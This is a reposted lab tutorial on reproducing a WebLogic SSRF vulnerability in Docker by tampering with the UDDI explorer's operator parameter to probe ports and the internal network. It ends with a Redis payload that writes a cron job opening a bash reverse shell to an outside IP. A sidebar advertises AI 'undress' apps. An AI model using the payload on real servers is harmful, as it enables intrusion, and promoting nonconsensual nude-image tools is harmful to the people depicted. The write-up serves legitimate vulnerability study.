search
HomeOperation and MaintenanceSafetyHow to Reproduce Weblogic SSRF Vulnerability

How to Reproduce Weblogic SSRF Vulnerability

May 14, 2023 pm 08:04 PM
weblogicssrf

1. Use docker to build an environment

Docker installation and environment building tutorial: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Access port 7001如何实现Weblogic SSRF漏洞复现

2. Vulnerability reproduction steps

1. Vulnerability page/uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2. Check IBM.

如何实现Weblogic SSRF漏洞复现

It is found that there is a connection, so there may be ssrf.

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4. Modify the connection of operator parameters

如何实现Weblogic SSRF漏洞复现

##5. Access result

Accessing a non-existing port returns could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

Accessing an existing port returns a status code

如何实现Weblogic SSRF漏洞复现

Access the intranet

如何实现Weblogic SSRF漏洞复现

Use redis to rebound the shell payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

The above is the detailed content of How to Reproduce Weblogic SSRF Vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement
This article is reproduced at:亿速云. If there is any infringement, please contact admin@php.cn delete

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

Atom editor mac version download

Atom editor mac version download

The most popular open source editor

VSCode Windows 64-bit Download

VSCode Windows 64-bit Download

A free and powerful IDE editor launched by Microsoft

WebStorm Mac version

WebStorm Mac version

Useful JavaScript development tools

MantisBT

MantisBT

Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment